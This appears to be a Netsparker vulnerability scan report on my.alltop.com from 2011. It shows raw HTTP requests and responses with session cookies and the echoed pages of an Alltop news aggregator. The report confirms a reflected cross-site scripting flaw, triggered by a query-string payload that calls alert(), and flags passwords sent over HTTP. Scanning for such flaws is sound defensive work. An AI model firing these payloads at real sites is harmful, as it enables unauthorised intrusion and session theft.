Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_45_15656_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:52:10 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:52:10 GMT; path=/; domain=.alltop.com,myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com,alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_45_15656_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:52:10 GMT; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:52:10 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Vary: Accept-Encoding
Content-Encoding:
Content-Length: 26233
Connection: close
Content-Type: text/html; charset=utf-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head> <title>MyAlltop - alisonvandiggelen</title> <meta http-equiv="Content-type" content="text/html; charset=UTF-8" /> <meta name="description" content="Alltop presents all the top stories from alisonvandiggelen websites. Think of Alltop as an online magazine rack." /> <meta name="keywords" content="" /> <link rel="icon" href="/favicon.ico" type="image/x-icon" /> <meta http-equiv="Content-type" content="text/html; charset=UTF-8" /> <link rel="apple-touch-icon" href="/apple-touch-icon.png" /> <link rel="alternate" type="application/rss+xml" href="http://my.alltop.com/alisonvandiggelen/rss" /> <meta name="author" content="electricpulp.com" /> <meta name="robots" content="noindex, nofollow" /> <link rel="stylesheet" href="/css/style.css" type="text/css" media="screen" charset="utf-8" /> <link rel="stylesheet" href="/css/iphone.css" type="text/css" media="only screen and (max-device-width: 480px)" /> <link rel="stylesheet" href="/css/ipad.css" type="text/css" media="only screen and (max-device-width: 1024px)" /> <!--[if IE 6]> <link rel="stylesheet" href="/css/ie_style.css" type="text/css" media="screen" charset="utf-8" /><![endif]--> <!-- Behaviors --> <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/mootools/1.11/mootools-yui-compressed.js" charset="utf-8"></script> <script type="text/javascript" src="http://alltop.com/scripts/alltop-clean.js" charset="utf-8"></script> <script type="text/javascript" charset="utf-8"><!--// <![CDATA[ var resultsSlider; var load_method = (window.ie ? 'load' : 'domready'); window.addEvent(load_method, function(){ resultsSlider = new Fx.Slide('results', {duration: 500}); resultsSlider.hide(); }); var skip_nav = true; // ]]> --></script> <script type="text/javascript" src="http://alltop.com/scripts/alltop.js" charset="utf-8"></script> <style type="text/css"> .add-feed { display:none; } </style> <!-- Analytics --> <script type="text/javascript"> window.google_analytics_uacct = "UA-1701157-4"; </script> <!-- Ads --> <script type='text/javascript'><!--// <![CDATA[ var OA_source = 'test'; var OA_zones = { 'leaderboard' : 70, 'slot_3_1' : 2, 'slot_3_2' : 3, 'slot_3_300_250' : 66, 'slot_9_300_250' : 69, 'slot_6_1' : 59, 'slot_6_2' : 60, 'slot_9_1' : 57, 'slot_9_2' : 58, 'slot_3' : 24, 'slot_6' : 4, 'slot_9' : 49 } // ]]> --></script> <script type='text/javascript' src='http://at-adserver.alltop.com/openx/www/delivery/spcjs.php?id=1&amp;target=_blank'></script> <!-- Typography --> <script type="text/javascript" src="/scripts/sifr/sifr.js"></script> <script type="text/javascript" src="/scripts/sifr/sifr-config.js"></script></head><body><script type='text/javascript'><!--// <![CDATA[OA_show('top_script');// ]]> --></script> <div id="opener"> <a href="http://alltop.com/" id="logo">Alltop</a> <div id="leaderboard"> <script type='text/javascript'><!--// <![CDATA[ OA_show('leaderboard'); // ]]> --></script> </div></div> <div id="wrap-discover"> <div id="discover" class="clearfix"> <div id="discover-by-cat"> <ul id="categories"> <li><a href="/topic/work" rel="1">Work</a></li><li><a href="/topic/health" rel="2">Health</a></li><li><a href="/topic/culture" rel="3">Culture</a></li><li><a href="/topic/interests" rel="4">Interests</a></li><li><a href="/topic/tech" rel="5">Tech</a></li><li><a href="/topic/people" rel="6">People</a></li><li><a href="/topic/good" rel="7">Good</a></li><li><a href="/topic/news" rel="8">News</a></li><li><a href="/topic/geos" rel="9">Geos</a></li><li><a href="/topic/sports" rel="10">Sports</a></li> </ul> </div> <div id="discover-alpha"> <ul id="alpha"> <li><a href="/alpha/a" rel="A">A</a></li><li><a href="/alpha/b" rel="B">B</a></li><li><a href="/alpha/c" rel="C">C</a></li><li><a href="/alpha/d" rel="D">D</a></li><li><a href="/alpha/e" rel="E">E</a></li><li><a href="/alpha/f" rel="F">F</a></li><li><a href="/alpha/g" rel="G">G</a></li><li><a href="/alpha/h" rel="H">H</a></li><li><a href="/alpha/i" rel="I">I</a></li><li><a href="/alpha/j" rel="J">J</a></li><li><a href="/alpha/k" rel="K">K</a></li><li><a href="/alpha/l" rel="L">L</a></li><li><a href="/alpha/m" rel="M">M</a></li><li><a href="/alpha/n" rel="N">N</a></li><li><a href="/alpha/o" rel="O">O</a></li><li><a href="/alpha/p" rel="P">P</a></li><li><a href="/alpha/q" rel="Q">Q</a></li><li><a href="/alpha/r" rel="R">R</a></li><li><a href="/alpha/s" rel="S">S</a></li><li><a href="/alpha/t" rel="T">T</a></li><li><a href="/alpha/u" rel="U">U</a></li><li><a href="/alpha/v" rel="V">V</a></li><li><a href="/alpha/w" rel="W">W</a></li><li><a href="/alpha/x" rel="X">X</a></li><li><a href="/alpha/y" rel="Y">Y</a></li><li><a href="/alpha/z" rel="Z">Z</a></li><li><a href="/alpha/#" rel="#">#</a></li> </ul> </div> </div> </div> <div id="wrap-search"> <div id="search" class="clearfix"> <ul id="navigation" class="tabs"> <li><a href="http://alltop.com/" class="hot-topics">Hot Topics</a></li> <li><a href="http://alltop.com/?new_topics=true" class="new-topics">New Topics</a></li> <li><a href="http://alltop.com/?recent_topics=true" class="my-recent-topics">My Recent Topics</a></li> <li class="here"><a href="http://my.alltop.com/" class="myalltop">MyAlltop</a></li> <li><a href="http://holykaw.alltop.com/" class="holykaw">HolyKaw</a></li> </ul> <div id="search-box"> <form action="/" method="get" id="search-form"> <input type="text" name="keywords" value="" id="key-words" /> <input type="image" src="/img/search-bttn.gif" id="bttn-search" /> </form> </div> </div> </div> <div id="wrap-results"> <div id="slide-results"> <div id="results" class="clearfix" style="visibility:hidden;"> </div> </div></div><div id="headlines" class="hfeed clearfix"> <h1 id="pagetitle" class="din"> Selected by alisonvandiggelen </h1> <ul id="top-five" class="feed-block"> <li class="site"> <h2>Most Topular Stories</h2> </li> <li class="hentry"> <h3 class="entry-title"><a href="http://www.npr.org/templates/topics/topic.php?topicId=1019" rel="bookmark" target="_blank">NPR: 03-02-2011 Technology</a></h3> <div class="full-post"> <div class="site-title">NPR: Technology Podcast</div> <div class="author">NPR</div> <div class="published">2 Mar 2011 | 8:23 pm</div> <div class="entry-content"> <div class="entry-bound">Stories: 1) High-Tech Rearview Mirror Can Curb Blind Spots 2) Examining Tablet Computer Craze</div> </div> </div> </li> <li class="hentry"> <h3 class="entry-title"><a href="http://feedproxy.google.com/~r/treehuggersite/~3/Z-SFa0TFF9U/jon-stewart-environmental-protections-rand-paul-video.php" rel="bookmark" target="_blank">Jon Stewart Explains Why We Need Environmental Protections to Rand Paul (Video)</a></h3> <div class="full-post"> <div class="site-title">TreeHugger</div> <div class="published">8 Mar 2011 | 12:17 pm</div> <div class="entry-content"> <div class="entry-bound">You may have heard something about the huge push in Congress to overturn or weaken some of our nation's central environmental laws. Politicians want to pull back the scope of the Clean Air & Water Acts to allow polluters to skirt expensive upgrades to cleaner equipment and practices. They argue that such regulations are an impediment to business, and with our weakened economy, we can't afford to make corporations pay for their pollution. But how else</div> </div> </div> </li> <li class="hentry"> <h3 class="entry-title"><a href="http://www.npr.org/templates/topics/topic.php?topicId=1025" rel="bookmark" target="_blank">NPR: 03-03-2011 Environment</a></h3> <div class="full-post"> <div class="site-title">NPR: Environment Podcast</div> <div class="author">NPR</div> <div class="published">3 Mar 2011 | 8:31 pm</div> <div class="entry-content"> <div class="entry-bound">Stories: 1) Oscars Accessory Checklist: Handbag, Heels, Hybrid 2) Gulf Spill Investigated As Cause Of Dolphin Deaths 3) Bilingual Babies More Perceptive To Nonnative Tongues 4) Back To Tradition, Bringing Home The Bison 5) The Art Of War On Invasive Species 6) A Growing Debate: How To Define 'Organic' Food</div> </div> </div> </li> <li class="hentry"> <h3 class="entry-title"><a href="http://feedproxy.google.com/~r/EnvironmentalNewsNetwork/~3/Fz6pdMsn9vc/42435" rel="bookmark" target="_blank">Countries agree to manage fishing in Northeast Pacific</a></h3> <div class="full-post"> <div class="site-title">Environment News Network</div> <div class="published">8 Mar 2011 | 4:08 am</div> <div class="entry-content"> <div class="entry-bound">Countries bordering the North Pacific Ocean have struck a deal that environmentalists said on Monday will help protect 16.1 million square miles (41.7 million sq km) of ocean floor from a destructive technique called bottom trawl fishing. The agreement calls for the creation of an organization to manage sea bottom fisheries in the North Pacific, and puts an immediate cap on expansion of bottom trawl fishing in international waters stretching from Hawaii to Alaska. The deal was reached last week in Vancouver by the United States, Japan, Canada, China, South Korea, Russia and Taiwan after&hellip;</div> </div> </div> </li> <li class="hentry"> <h3 class="entry-title"><a href="http://www.huffingtonpost.com/2011/03/08/wyoming-ait-pollution-gas-drilling_n_833027.html" rel="bookmark" target="_blank">Wyoming Smog Worse Than Los Angeles Due To Gas Drilling</a></h3> <div class="full-post"> <div class="site-title">Huffington Post: Latest Green News</div> <div class="author">AP</div> <div class="published">8 Mar 2011 | 11:50 am</div> <div class="entry-content"> <div class="entry-bound">CHEYENNE, Wyo. -- Wyoming, famous for its crisp mountain air and breathtaking, far-as-the-eye-can-see vistas, is looking a lot like smoggy Los Angeles these days because of a boom in natural gas drilling. Folks who live near the gas fields in the western part of this outdoorsy state are complaining of watery eyes, shortness of breath and bloody noses because of ozone levels that have exceeded what people in L.A. and other major cities wheeze through on their worst pollution days. "It is scary to me personally. I never would have guessed in a million years you would have that kind of danger&hellip;</div> </div> </div> </li> </ul> <ul id="feed199793" class="feed-block 381811c30f2a22a2f9212b18a0df7761"> <li class="site"><div class="add-feed"><img src="/images/added-my.gif" alt="added to my.Alltop" class="added-feed-my" style="display:none" /><a href="#" class="add-feed-my" title="add this feed to my.Alltop"><img src="/images/add-my.gif" alt="add this feed to my.Alltop" /></a></div><h2><a href="http://www.npr.org/templates/topics/topic.php?topicId=1019" target="_blank" class="snap_shots">NPR: Technology Podcast</a></h2></li><li class="hentry"><h3 class="entry-title"><a href="http://www.npr.org/templates/topics/topic.php?topicId=1019" rel="bookmark" target="_blank">NPR: 03-02-2011 Technology</a></h3><div class="full-post"><div class="author">NPR</div><div class="published">2 Mar 2011 | 8:23 pm</div><div class="entry-content"><div class="entry-bound">Stories: 1) High-Tech Rearview Mirror Can Curb Blind Spots 2) Examining Tablet Computer Craze</div></div></div></li><li class="hentry"><h3 class="entry-title"><a href="http://www.npr.org/templates/topics/topic.php?topicId=1019" rel="bookmark" target="_blank">NPR: 02-23-2011 Technology</a></h3><div class="full-post"><div class="author">NPR</div><div class="published">23 Feb 2011 | 8:16 pm</div><div class="entry-content"><div class="entry-bound">Stories: 1) Internet Freedom And U.S. State Department 2) Who Is The New Overlord? 3) I'll Take 'New Computer Overlords' For $1,000, Alex 4) The Dark Side of Watson 5) The Revolution Will Be Tweeted 6) Mobile Payments Challenge Credit Cards</div></div></div></li><li class="hentry"><h3 class="entry-title"><a href="http://www.npr.org/templates/topics/topic.php?topicId=1019" rel="bookmark" target="_blank">NPR: 02-16-2011 Technology</a></h3><div class="full-post"><div class="author">NPR</div><div class="published">16 Feb 2011 | 8:04 pm</div><div class="entry-content"><div class="entry-bound">Stories: 1) The Business Of Color: Company Sets Fashion Trends 2) How Events In Egypt Are Playing Out Online 3) Defining A Data Deluge 4) On 'Jeopardy!' It's Man Vs. This Machine 5) The Incredible Shrinking Cubicle 6) Ken And Barbie Update Their Status</div></div></div></li><li class="hentry"><h3 class="entry-title"><a href="http://www.npr.org/templates/topics/topic.php?topicId=1019" rel="bookmark" target="_blank">NPR: 02-09-2011 Technology</a></h3><div class="full-post"><div class="author">NPR</div><div class="published">9 Feb 2011 | 8:09 pm</div><div class="entry-content"><div class="entry-bound">Stories: 1) iPad Storybook Apps And The Kids Who Love Them 2) Dilemma For U.S.: Does Net Freedom Trump Security? 3) Why The Internet Is Running Out Of Addresses 4) Is That An Ad Growing In Your FarmVille..
- /adamengst

/adamengst CONFIRMED

http://my.alltop.com/adamengst?"><object/onerror=alert(9)>

Parameters

Parameter Type Value
Query Based QUERYSTRING "><object/onerror=alert(9)>

Request

GET /adamengst?"><object/onerror=netsparker(9)> HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_45_15656_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:54:54 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:54:54 GMT; path=/; domain=.alltop.com,myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com,alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_45_15656_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:54:54 GMT; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:54:54 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Vary: Accept-Encoding
Content-Encoding:
Content-Length: 27031
Connection: close
Content-Type: text/html; charset=utf-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head> <title>MyAlltop - adamengst</title> <meta http-equiv="Content-type" content="text/html; charset=UTF-8" /> <meta name="description" content="Alltop presents all the top stories from adamengst websites. Think of Alltop as an online magazine rack." /> <meta name="keywords" content="" /> <link rel="icon" href="/favicon.ico" type="image/x-icon" /> <meta http-equiv="Content-type" content="text/html; charset=UTF-8" /> <link rel="apple-touch-icon" href="/apple-touch-icon.png" /> <link rel="alternate" type="application/rss+xml" href="http://my.alltop.com/adamengst/rss" /> <meta name="author" content="electricpulp.com" /> <meta name="robots" content="noindex, nofollow" /> <link rel="stylesheet" href="/css/style.css" type="text/css" media="screen" charset="utf-8" /> <link rel="stylesheet" href="/css/iphone.css" type="text/css" media="only screen and (max-device-width: 480px)" /> <link rel="stylesheet" href="/css/ipad.css" type="text/css" media="only screen and (max-device-width: 1024px)" /> <!--[if IE 6]> <link rel="stylesheet" href="/css/ie_style.css" type="text/css" media="screen" charset="utf-8" /><![endif]--> <!-- Behaviors --> <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/mootools/1.11/mootools-yui-compressed.js" charset="utf-8"></script> <script type="text/javascript" src="http://alltop.com/scripts/alltop-clean.js" charset="utf-8"></script> <script type="text/javascript" charset="utf-8"><!--// <![CDATA[ var resultsSlider; var load_method = (window.ie ? 'load' : 'domready'); window.addEvent(load_method, function(){ resultsSlider = new Fx.Slide('results', {duration: 500}); resultsSlider.hide(); }); var skip_nav = true; // ]]> --></script> <script type="text/javascript" src="http://alltop.com/scripts/alltop.js" charset="utf-8"></script> <style type="text/css"> .add-feed { display:none; } </style> <!-- Analytics --> <script type="text/javascript"> window.google_analytics_uacct = "UA-1701157-4"; </script> <!-- Ads --> <script type='text/javascript'><!--// <![CDATA[ var OA_source = 'test'; var OA_zones = { 'leaderboard' : 70, 'slot_3_1' : 2, 'slot_3_2' : 3, 'slot_3_300_250' : 66, 'slot_9_300_250' : 69, 'slot_6_1' : 59, 'slot_6_2' : 60, 'slot_9_1' : 57, 'slot_9_2' : 58, 'slot_3' : 24, 'slot_6' : 4, 'slot_9' : 49 } // ]]> --></script> <script type='text/javascript' src='http://at-adserver.alltop.com/openx/www/delivery/spcjs.php?id=1&amp;target=_blank'></script> <!-- Typography --> <script type="text/javascript" src="/scripts/sifr/sifr.js"></script> <script type="text/javascript" src="/scripts/sifr/sifr-config.js"></script></head><body><script type='text/javascript'><!--// <![CDATA[OA_show('top_script');// ]]> --></script> <div id="opener"> <a href="http://alltop.com/" id="logo">Alltop</a> <div id="leaderboard"> <script type='text/javascript'><!--// <![CDATA[ OA_show('leaderboard'); // ]]> --></script> </div></div> <div id="wrap-discover"> <div id="discover" class="clearfix"> <div id="discover-by-cat"> <ul id="categories"> <li><a href="/topic/work" rel="1">Work</a></li><li><a href="/topic/health" rel="2">Health</a></li><li><a href="/topic/culture" rel="3">Culture</a></li><li><a href="/topic/interests" rel="4">Interests</a></li><li><a href="/topic/tech" rel="5">Tech</a></li><li><a href="/topic/people" rel="6">People</a></li><li><a href="/topic/good" rel="7">Good</a></li><li><a href="/topic/news" rel="8">News</a></li><li><a href="/topic/geos" rel="9">Geos</a></li><li><a href="/topic/sports" rel="10">Sports</a></li> </ul> </div> <div id="discover-alpha"> <ul id="alpha"> <li><a href="/alpha/a" rel="A">A</a></li><li><a href="/alpha/b" rel="B">B</a></li><li><a href="/alpha/c" rel="C">C</a></li><li><a href="/alpha/d" rel="D">D</a></li><li><a href="/alpha/e" rel="E">E</a></li><li><a href="/alpha/f" rel="F">F</a></li><li><a href="/alpha/g" rel="G">G</a></li><li><a href="/alpha/h" rel="H">H</a></li><li><a href="/alpha/i" rel="I">I</a></li><li><a href="/alpha/j" rel="J">J</a></li><li><a href="/alpha/k" rel="K">K</a></li><li><a href="/alpha/l" rel="L">L</a></li><li><a href="/alpha/m" rel="M">M</a></li><li><a href="/alpha/n" rel="N">N</a></li><li><a href="/alpha/o" rel="O">O</a></li><li><a href="/alpha/p" rel="P">P</a></li><li><a href="/alpha/q" rel="Q">Q</a></li><li><a href="/alpha/r" rel="R">R</a></li><li><a href="/alpha/s" rel="S">S</a></li><li><a href="/alpha/t" rel="T">T</a></li><li><a href="/alpha/u" rel="U">U</a></li><li><a href="/alpha/v" rel="V">V</a></li><li><a href="/alpha/w" rel="W">W</a></li><li><a href="/alpha/x" rel="X">X</a></li><li><a href="/alpha/y" rel="Y">Y</a></li><li><a href="/alpha/z" rel="Z">Z</a></li><li><a href="/alpha/#" rel="#">#</a></li> </ul> </div> </div> </div> <div id="wrap-search"> <div id="search" class="clearfix"> <ul id="navigation" class="tabs"> <li><a href="http://alltop.com/" class="hot-topics">Hot Topics</a></li> <li><a href="http://alltop.com/?new_topics=true" class="new-topics">New Topics</a></li> <li><a href="http://alltop.com/?recent_topics=true" class="my-recent-topics">My Recent Topics</a></li> <li class="here"><a href="http://my.alltop.com/" class="myalltop">MyAlltop</a></li> <li><a href="http://holykaw.alltop.com/" class="holykaw">HolyKaw</a></li> </ul> <div id="search-box"> <form action="/" method="get" id="search-form"> <input type="text" name="keywords" value="" id="key-words" /> <input type="image" src="/img/search-bttn.gif" id="bttn-search" /> </form> </div> </div> </div> <div id="wrap-results"> <div id="slide-results"> <div id="results" class="clearfix" style="visibility:hidden;"> </div> </div></div><div id="headlines" class="hfeed clearfix"> <h1 id="pagetitle" class="din"> Selected by adamengst </h1> <ul id="top-five" class="feed-block"> <li class="site"> <h2>Most Topular Stories</h2> </li> <li class="hentry"> <h3 class="entry-title"><a href="http://db.tidbits.com/article/12015?rss" rel="bookmark" target="_blank">Wrangle Windows on a Mac with New Take Control Ebook</a></h3> <div class="full-post"> <div class="site-title">TidBITS: Mac News for the Rest of Us</div> <div class="published">7 Mar 2011 | 9:31 am</div> <div class="entry-content"> <div class="entry-bound">Now that running Windows on an Intel-based Mac has become commonplace, you might think that it has also become easy. Alas, the technology gods have yet to make it so, and making Windows run smoothly can still be a Herculean task. This fact also keeps Mac writers like Joe Kissell busy, and, thanks to Joe’s unstoppable curiosity, we’ve just released the helpful and comprehensive “Take Control of Running Windows on a Mac, Fifth Edition.” The 178-page ebook is available for $15. “Take Control of Running Windows on a Mac, Fifth Edition” kicks off by helping you figure out which version&hellip;</div> </div> </div> </li> <li class="hentry"> <h3 class="entry-title"><a href="http://feedproxy.google.com/~r/GreenerComputing/~3/4zIsJCzBUks/exploring-ways-reduce-its-environmental-impacts" rel="bookmark" target="_blank">Exploring Ways to Reduce IT's Environmental Impact</a></h3> <div class="full-post"> <div class="site-title">Greener Computing</div> <div class="author">Matthew Wheeland</div> <div class="published">8 Mar 2011 | 9:05 am</div> <div class="entry-content"> <div class="entry-bound">A recent issue of the Journal of Industrial Ecology takes on real-world implementations of green IT, showing how technology can make everything from manufacturing to irrigation to the government more efficient.</div> </div> </div> </li> <li class="hentry"> <h3 class="entry-title"><a href="http://feedproxy.google.com/~r/RTRadio/~3/Jr1vZd8fyfo/4838014" rel="bookmark" target="_blank">Greg Meyer: The Last American Man to Win Boston</a></h3> <div class="full-post"> <div class="site-title">Running Times</div> <div class="published">3 Mar 2011 | 6:42 am</div> <div class="entry-content"> <div class="entry-bound">Greg Meyer, the 1983 Boston Marathon champion, is the last American man to win the race. Here he details his training and racing leading up to that historic victory, and he discusses the mistakes he sees today's American runners making that prevent them from stripping him of his unwanted title. (16:08)</div> </div> </div> </li> <li class="hentry"> <h3 class="entry-title"><a href="http://www.sikantisearth.com/earth/?p=3103" rel="bookmark" target="_blank">A Day of Glass</a></h3> <div class="full-post"> <div class="site-title">Innovative News</div> <div class="author">Cecilia</div> <div class="published">3 Mar 2011 | 2:31 pm</div> <div class="entry-content"> <div class="entry-bound">Corning has produced a video showing the fictional day-in-the-life of a typical family at some point in our future.  The video predicts an ominpresent glass screen technology that is with us from the time we wake up until the time we go to bed.  Techno nirvana or techno nightmare?  Watch the video and decide for yourself.</div> </div> </div> </li> <li class="hentry"> <h3 class="entry-title"><a href="http://www.chow.com/food-news/73920/do-you-take-your-ipad-in-the-kitchen/" rel="bookmark" target="_blank">Do You Take Your iPad in the Kitchen?</a></h3> <div class="full-post"> <div class="site-title">CHOW: CHOW Pick</div> <div class="author">Joyce Slaton</div> <div class="published">18 Feb 2011 | 10:17 am</div> <div class="entry-content"> <div class="entry-bound">One of the best things about cooking from books or paper recipes is that you can mark up the recipe as you adapt it to your own tastes. Maybe you replace half the oil in the muffins with applesauce, or you put an extra two cloves of garlic in, or dear God, it's only half a teaspoon of salt, not two tablespoons. Whatever you change, you want to remember it, and one glaring flaw of most of the electronic recipe apps out there is that they don't allow it. The Recipe Box, a neat, sweet little recipe-keeping iPad app developed by a couple of cooking pals in the San Francisco Bay Area, does.</div> </div> </div> </li> </ul> <ul id="feed268" class="feed-block c5fdd950291812e416685c27770fd00e"> <li class="site"><div class="add-feed"><img src="/images/added-my.gif" alt="added to my.Alltop" class="added-feed-my" style="display:none" /><a href="#" class="add-feed-my" title="add this feed to my.Alltop"><img src="/images/add-my.gif" alt="add this feed to my.Alltop" /></a></div><h2><a href="http://www.tidbits.com/" target="_blank" class="snap_shots">TidBITS: Mac News for the Rest of Us</a></h2></li><li class="hentry"><h3 class="entry-title"><a href="http://db.tidbits.com/article/12015?rss" rel="bookmark" target="_blank">Wrangle Windows on a Mac with New Take Control Ebook</a></h3><div class="full-post"><div class="author"></div><div class="published">7 Mar 2011 | 9:31 am</div><div class="entry-content"><div class="entry-bound">Now that running Windows on an Intel-based Mac has become commonplace, you might think that it has also become easy. Alas, the technology gods have yet to make it so, and making Windows run smoothly can still be a Herculean task. This fact also keeps Mac writers like Joe Kissell busy, and, thanks to Joe’s unstoppable curiosity, we’ve just released the helpful and comprehensive “Take Control of Running Windows on a Mac, Fifth Edition.” The 178-page ebook is available for $15. “Take Control of Running Windows on a Mac, Fifth Edition” kicks off by helping you figure out which version&hellip;</div></div></div></li><li class="hentry"><h3 class="entry-title"><a href="http://db.tidbits.com/article/12002?rss" rel="bookmark" target="_blank">Firefox 3.6.15</a></h3><div class="full-post"><div class="author"></div><div class="published">7 Mar 2011 | 7:58 am</div><div class="entry-content"><div class="entry-bound">Mozilla has released Firefox 3.6.14, a minor security and stability update to the open-source Web browser that’s approaching a major new version. Mozilla doesn’t say much about the changes, which were equally small in the previous few updates, but it’s worth updating if you use Firefox on a regular basis, just to make sure you have the latest code. And now, that means Firefox 3.6.15, which fixes a problem in 3.6.14 that prevented some Java applets from loading. (Free, 17.6 MB) &nbsp;Read and post comments about this article | Tweet this article SYNC YOUR PHONE with The Missing Sync:&hellip;</div></div></div></li><li class="hentry"><h3 class="entry-title"><a href="http://db.tidbits.com/article/12012?rss" rel="bookmark" target="_blank">SpamSieve 2.8.5</a></h3><div class="full-post"><div class="author"></div><div class="published">3 Mar 2011 | 11:57 am</div><div class="entry-content"><div class="entry-bound">Surely to the chagrin of Nigerian princes everywhere, C-Command has released SpamSieve 2.8.5. The new update improves SpamSieve’s filtering accuracy, and also improves compatibility with new MacBook Pros, pre-release versions of Mac OS X Lion, and Freron Software’s new MailMate. Outlook and Entourage integrations now work more smoothly, and SpamSieve’s plug-in for Apple Mail now runs in 64-bit..
Password Transmitted Over HTTP

Password Transmitted Over HTTP

1 TOTAL
IMPORTANT
CONFIRMED
1
Netsparker identified that password data is sent over HTTP.

Impact

If an attacker can intercept network traffic he/she can steal users credentials.

Actions to Take

  1. See the remedy for solution.
  2. Move all of your critical forms and pages to HTTPS and do not serve them over HTTP.

Remedy

All sensitive data should be transferred over HTTPS rather than HTTP. Forms should be served over HTTPS. All aspects of the application that accept user input starting from the login process should only be served over HTTPS.
- /alpha/

/alpha/ CONFIRMED

http://my.alltop.com/alpha/

Form target action

/alpha/

Request

GET /alpha/ HTTP/1.1
Referer: http://my.alltop.com/alpha/a
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:48:03 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
